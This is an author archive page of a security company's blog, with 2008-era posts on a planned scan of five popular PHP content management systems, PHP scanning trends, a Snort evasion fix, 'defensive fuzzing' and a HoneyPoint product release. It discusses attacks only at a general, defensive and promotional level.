Author Archives: Brent Huston

About Brent Huston

I am the CEO of MicroSolved, Inc. and a security evangelist. I have spent the last 20+ years working to make the Internet safer for everyone on a global scale. I believe the Internet has the capability to contribute to the next great leap for mankind, and I want to help make that happen!

Project Pre-Release – Vulnerabilities in Popular Content Management Systems Under Study

Posted on by
Reply

Over the next few weeks you will see more details from us about a project that we have been working on. As a part of our relationship with Syhunt, one of our elite partners for application security work, we have been testing and reviewing their new tool, Sandcat4PHP. The tool is a sophisticated and user friendly source code scanner for performing deep analysis of PHP applications including their surrounding javascript and HTML components.

Stay posted here for a pretty in-depth review of the new tool, its use and capabilities. We will be doing that review as a part of the project as well.

First, let me start with the purpose and the scope of the project. In the last few months we have worked with a number of clients who have had issues with the security of their content management system. More than a few of them are using popular products, but several are using proprietary tools as well. As such, we have worked on a few incidents and application reviews. That led to a pretty in-depth discussion between a couple of clients and ourselves about the state of content management system security, in general. As an off shoot of that discussion, we decided to test 5 of the most popular content managers using the new Syhunt PHP scanner, since we needed to review it anyway.

Next, we obtained a couple of lists of popular content managers. Selecting our five was pretty easy and we settled on the following:

WordPress, Joomla!, Mambo, Drupal and BitWeaver

We then downloaded the current versions of the CMS (as of that day, a couple of weeks ago…) and set up our testing environment.

We assessed the entire package, but only as downloaded from the web site. That means in most cases, that we tested only the core components and not any additional modules, plugins or components. We considered whatever was in the default download to be the basis for our work.

To date, we have begun our assessments and review of the CMS tools. We will be in contact with each of the CMS projects about the findings of the assessments and they will receive the details of the tool’s findings prior to public release of the technical details. Statistical and numeric data will also be forthcoming.

For now just let us say that we are evaluating our findings and that the tool performed very very well.

I look forward to sharing the details with everyone in the coming days.

Let me know if you have any questions about the product, the project or the work.

June Virtual Event Announced – Social Engineering Assessments Primer

Posted on by
Reply

We are proud to announce our June Virtual Event topic for the month. Please join us as we cover a primer for social engineering assessments and how they can assist you in securing your organization. As always, our virtual events are long on information and short on sales and spin. They are also FREE!

Abstract:

This presentation will cover the reasons why your organization should consider a social engineering assessment as a part of their routine security auditing processes. Examples of test scenarios will be given, along with ideas on scoping such tests. Further, ways to appropriately use the results and tips on presenting the identified issues to upper management will be discussed.

Date: Tuesday, June 26th at 4pm Eastern

To register for the presentation and to receive the PDF of the slides as well as the dial in number, please send email to info@microsolved.com with “June Virtual Event” or the like in the subject line.


Editors note: Sorry for the need to create a subject clarification, but we are holding several events this month including live and virtual versions of our State of the Threat presentations. If you need more info about those presentations, just ask. Thanks!

Increases in PHP Scanning

Posted on by
Reply

We are detecting increasing PHP scans for a series of known PHP vulnerabilities that thus far are originating from Asia.

To date, we see no new attacks, just checks for known bad pages, particularly admin interfaces and a couple of quick URLs to test for command injections. The scans seem to have begun in the last 24 hours and the traffic appears to be related to a possible new PHP scanner. Likely, some new tool has been released that contains a plethora of PHP vulnerabilities.

Organizations should ensure that any systems offering PHP or PHP applications have been properly assessed and patched.

HoneyPoint Security Server users are urged to deploy a web HoneyPoint or HornetPoint and to drop the hosts performing the scans into your firewall or router black hole lists. This should allow you to create a “one strike and you’re out” approach for black holing attacking systems.

Please let us know if you see any new PHP activity. We are currently watching this pattern for any zero-day type activity, but thus far, we have observed only known security issues. being probed.

SHOCKER – The FBI says Wi-Fi Hotspots are Insecure!!!

Posted on by
Reply

It’s hard to believe, but the FBI has recently announced that Wi-Fi Hotspots might not be secure.

I read it here, so it must be true… 😉

In a way I am glad to see public notices like this. Maybe if the FBI draws attention to the problems, average people will pay attention to the solution. Of course, their mitigation suggestions include the “keep your computer patched, use firewall and encryption” routine.

The sad part is that you can do all of these things and still fall victim to a number of security issues such as dns poisoning, DHCP spoofing, social engineering and a myriad of other problems. I guess that is a perfect reason why we push so hard for average folks to use our HoneyPoint:Network Trust Agent product. At less than 10 bucks, it adds yet more capability and ease of use to protecting even non-technical users when they are on untrusted networks, including wi-fi.

Public networks are likely to remain unsafe for users who are not vigilant for a long time to come. Firewalls and patches can help keep them safe, but until they make better decisions about information security and can resist many of the basic attacks that leverage social engineering and the like, free wi-fi will likely be a cyber-wild west for a while longer.

If you want to hear more about protecting mobile users against public network threats, drop us a line. Until then, we will wait to hear from the FBI. Maybe they can help us get the word out that there is help available for wi-fi users.

Time to Play Some Offense…

Posted on by
Reply

To quote, Allan Bergen, it sure looks like it might be “time to play some offense”…

Not surprising to me, I read today that the primary security concern of IT managers is the inside threat. It doesn’t surprise me because I have been working on educating organizations for several years about the seriousness of the insider threat. In fact, I would suggest that there are very very few threats that are NOT insider threats. Why? Because there really is no inside or outside. Thanks to disruptive technologies and evolved attacker capabilities – just about everything is exposed to attack. Just ask some of the recent vendors who were compromised in high profile “PCI-related” cases how well they feel that their “perimeter security” protected them…

The truth is, there are three powerful things that can be done to combat modern attacks, whether internal-based or executed by attackers half a world away.

1. Implement and enforce data classification – Know where your critical assets are, how they move around your environment throughout their lifecycle and then use tools like access controls, encryption and integrity verification to make sure that they are protected. Use logging analysis and event management to detect issues and make sure all of the controls, including role-based access controls, are HEAVILY and PERIODICALLY tested.

2. Embrace enclaving – Enclaving is like defense in depth throughout the whole network. Establish proper need to know boundaries, then build enclaves of security mechanisms around the data. Don’t build networks that trust user workstations with access to databases and other servers, segregate them with firewalls, detection mechanisms and access controls. Build as much security for the users as makes sense, but design the environment so that if users make bad decisions (which they will) and get popped – so what! Client side exploits and malware are only a concern if users have access to inordinate amounts of data. The problem is making sure that you get your controls and practices tight enough to limit the exposure that user compromise presents. That alone should go a LONG way toward minimizing your risk if done properly.

3. Move up the security stack to Threat Management and Risk Assessment – Use processes like risk assessment as a factor in business decision making. Security can truly empower business, but you have to let security teams stop being the “patch patrol” and “net cop” and let them get to actually helping you manage risk. They have to be able to identify threats, model threats and understand attacks and exposures. That requires education, dependable tools and upper management support. Encourage your security team to mature and begin to take real-world risk into consideration. Help them to resist the cult of the arcane technical security issue…

Of course, MicroSolved can help you with all three of these areas. We have the experience, insight and expertise to help you build effective enclaves and design data classification systems that make sense. We can help your team find security assessment goals that make more sense and provide ongoing assessment to keep them focused on the real-world risks. Our HoneyPoint products can help them model threats, frequency of attacks, understand the capability and intent of attackers and even give them deep insight into proactive risk metrics that they can leverage for “more science than academic” metrics of risk measurement. All of these things help your organization protect against the insider threat. All of them are available today.

The bottom line is this – if you are an IT manager looking to defend against the insider threat – give us a call. Together we can apply these strategies and others that your organization may need to effectively manage their risk and protect their assets.

At MicroSolved, we think differently about information security. So should you.

Snort Issues In Case You Missed Them and Malicious SWF

Posted on by
Reply

In case you missed it last week, Snort seems to be suffering from a problem with odd TTL values, which could allow an attack to get by Snort without detection. 2.8.1 has been released and includes the fix for the issue. Users of Snort should upgrade as soon as possible or apply the following workaround until they can update:

/From iDefense/

In the snort.conf file, set the ttl_limit configuration value to 255 as shown below.

preprocessor frag3_engine: ttl_limit 255

This will set the allowable difference to the maximum possible value, and prevent fragments from being dropped.

/End iDefense Content/

Also, SANS is talking about malicious SWF files that have been found online. Looks like they are using some encoded images that can cause some issues with what may be a previously known flash player vulnerability. Advise your users to be wary of flash enabled sites that they would consider “untrusted”. Of course, your milage may vary with this one, but at least awareness might help….

Lastly, as refresher, if you are a Notes/Domino user, it might be a good idea to check out patches that have been released lately. There have been a number of issues in the last few weeks and we are seeing an increase in Domino fingerprinting on some of our non-US HoneyPoints. Looks like quick scans for names.nsf and a couple of other common Notes files. So far though, we have not seen any attacker activity out of the norm, but it may be the precursor to an attack or other activity. Just an FYI…

What is “Defensive Fuzzing”?

Posted on by
Reply

Since the release of HornetPoints with the newest version of HoneyPoint Security Server, I have been getting a lot of mail asking about “defensive fuzzing”. I thought I would take a moment and talk a little bit about it and explain a bit about its uses.

Defensive fuzzing is a patent-pending approach to network, system and application defense. It is based on the idea of using techniques from “fuzz testing”, but applying them against incoming connections in a defensive manner rather than as a test mechanism for known software. The idea is that attacker tools and malware probably fail to meet established best practices for software development and thus, are likely to have issues with unexpected input just as normal professionally developed software does. Further, “defensive fuzzing” lends itself to using fuzzing techniques as a protective mechanism to cause attacker tools, malware and other illicit code to abnormally terminate. Basically, by fuzzing incoming connections to a HornetPoint (which should have no real world use, thus all incoming connections are illicit) we can terminate scans, probes, exploits, worms, etc. and reduce the risk that our organization (and other organizations) face from these attacks.

For those of you who might not be familiar with fuzzing, you can read more about the basics of it here. However, keep in mind, that defensive fuzzing applies these techniques in new ways and for a protective purpose rather than a software testing process.

HornetPoints simply embody this process. They can be configured to fuzz many types of existing connections, emulating varying protocols and applications. For example, targeting spam and relay scanners can be done by implementing the SMTP HornetPoint. It listens on the SMTP port and appears to be a valid email relay. Instead, however, it not only captures the source and traffic from the spammers, but also fuzzes the connection as the spam is sent, attempting to terminate the spammer scanning tool, bot-net client or other form of malware that is generating the traffic. Obviously, success rates vary, but our testing has shown the process to be quite effective against a number of tools and code bases used by attackers today.

That is just one example and many more are possible. For more information about defensive fuzzing or HornetPoints, please leave us a comment or contact us. We would be happy to discuss this evolution in security with you!

HoneyPoint Security Server Creates Proactive Protection

Posted on by
1

Columbus, Ohio; May 19, 2008 – MicroSolved, Inc. is pleased to announce the general availability of HoneyPoint™ Security Server version 2.50.

This latest release of their best-of-breed corporate honeypot product expands its capabilities to include new types of bleeding-edge protection in the form of HornetPoints and HoneyPoint Trojans. HornetPoints introduce a pioneering and patent-pending approach called “defensive fuzzing” that identifies and stops attacker activity in its earliest stage of reconnaissance, in some cases, literally eliminating bot-net and zero-day attacks before they have a chance to begin and propagate. HoneyPoint Trojans, modeled after the counter-intelligence efforts of nation states, enables organizations to create pockets of “dis-information” that, once touched, create a forensic tracking capability that follows it’s movement inside the network or out. Imagine the ability to literally turn the tables on attackers as you follow how this data is spread and used as it moves around the world.

“The addition of HornetPoints to the product really takes things to a new level. For the first time, organizations can proactively create protection that is robust, effective and capable of automatically defending them against many forms of attack.”, declared Brent Huston, CEO of MicroSolved. “Add the HoneyPoint Trojans to that mix and you finally have organizations that are capable of removing the layers of confidentiality, integrity and availability from attackers. Used properly and creatively, the product lends itself well to the creation of a corporate counter intelligence program.”, Huston added.

“Any organization that wants to improve their traditional security approach from a  “defense-only” posture to a new and pro-active mode of protection, simply must have a look at HoneyPoint. I don’t care how many layers of defense you have… it’s time to play some offense.”, said Allan Bergen, Business Development Director of MicroSolved.

For details on obtaining the 2.50 upgrades and/or to discuss the product or its new features, please contact a MicroSolved account executive. For more information, please visit www.microsolved.com/honeypoint

About MicroSolved, Inc.

MicroSolved, Inc. was founded in 1992, making it one of the most experienced information security services companies in the world. Providing risk assessment, ethical hacking, penetration testing and security intelligence to organizations of all sizes has been their passion for more than a decade. Today, they secure businesses on a global scale and still provide expertise close to home. From governments to the Fortune 500 and from small business to your business, they are the security experts you can trust.

Press Contacts

Brent Huston
CEO & Security Evangelist
(614) 351-1237 x201
Info@microsolved.com

Allan Bergen
Business Development Director
(614) 351-1237 x 250
Info@microsolved.com

Fear Renewed: The Cisco Router Rootkit

Posted on by
Reply

The media is all abuzz about a possible Cisco router rootkit that may be part of a presentation at a near future security conference.

While various issues with Cisco gear have emerged over the years and there has been at least one really public overreaction on the part of Cisco to vulnerability disclosure talks, there is probably little to really get spun up about here for the average corporate manager or infosec person.

The big news is that hostile, difficult to detect code could be introduced to routers at any point in their lifespan if an attacker has access to introduce images onto the router. This is a common problem with almost every type of device. There have been a number of trojan horse loads for everything from home firewalls to other forms of network gear for a number of years. Sure, the Cisco router is almost ubiquitous, and sure, it powers a lot of the Internet at large, but I think we pretty much always assumed that attackers with physical access and opportunity could introduce bad things to a device if they gained opportunity.

So before you give in to the hype or fear mongering, consider how this is different than any other form of software/firmware or the like. Likely, you already have a process in place for blowing new firmware onto all devices you purchase before putting them into use (right???). If not, it might be time to think about writing one…

April Virtual Event MP3 Available – Selling Security to Upper Management

Posted on by
Reply

We are pleased to announce the availability of the MP3 from last month’s virtual event that covered the selling of security to upper management.

We got great feedback on the event and plan to continue our monthly virtual presentations. If there are topics you would like to see us cover or want us to dig into, please drop us a line or comment.

The slides for this presentation are available here.

The MP3 is available here.

Thanks again for spending time with us. We really love working with each and every one of you!